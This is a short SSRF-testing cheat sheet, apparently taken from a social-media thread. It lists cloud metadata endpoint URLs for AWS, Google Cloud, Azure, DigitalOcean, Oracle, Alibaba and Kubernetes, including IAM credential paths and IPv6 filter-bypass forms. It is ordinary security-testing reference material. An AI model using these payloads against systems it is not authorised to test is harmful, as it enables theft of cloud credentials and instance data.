Cloud Metadata Dictionary useful for SSRF Testing

## IPv6 Tests

http://[::ffff:169.254.169.254]

http://[0:0:0:0:0:ffff:169.254.169.254]

## AWS

# Amazon Web Services (No Header Required)

# from docs.aws.amazon.com/AWSEC2/latest/…

http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy

http://169.254.169.254/latest/user-data

http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]

http://169.254.169.254/latest/meta-data/ami-id

http://169.254.169.254/latest/meta-data/reservation-id

http://169.254.169.254/latest/meta-data/hostname

http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key

# ECS Task : docs.aws.amazon.com/AmazonECS/late…

http://169.254.170.2/v2/credentials/

## Google Cloud (Header Sometimes Required)

# - Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" on API v1

# - Most endpoints can be accessed via the v1beta API without a header

http://169.254.169.254/computeMetadata/v1/

http://metadata.google.internal/computeMetadata/v1/

http://metadata/computeMetadata/v1/

http://metadata.google.internal/computeMetadata/v1/instance/hostname

http://metadata.google.internal/computeMetadata/v1/instance/id

## Digital Ocean (No Header Required)

# developers.digitalocean.com/documentation/…

http://169.254.169.254/metadata/v1.json

http://169.254.169.254/metadata/v1/

http://169.254.169.254/metadata/v1/id

http://169.254.169.254/metadata/v1/user-data

http://169.254.169.254/metadata/v1/hostname

http://169.254.169.254/metadata/v1/region

http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address

## Azure (Header Required)

# Header: "Metadata: true"

# docs.microsoft.com/en-us/azure/vi…

http://169.254.169.254/metadata/instance?api-version=2017-04-02

http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text

## Oracle Cloud (No Header Required)

# docs.us-phoenix-1.oraclecloud.com/Content/Comput…

http://169.254.169.254/opc/v1/instance/

## Alibaba

# alibabacloud.com/help/faq-detai…

http://100.100.100.200/latest/meta-data/

http://100.100.100.200/latest/meta-data/instance-id

http://100.100.100.200/latest/meta-data/image-id

## Kubernetes

# Debug Services (kubernetes.io/docs/tasks/deb…)

https://kubernetes.default.svc.cluster.local

https://kubernetes.default

https://kubernetes.default.svc/metrics

Thread by Tushar Verma 🇮🇳
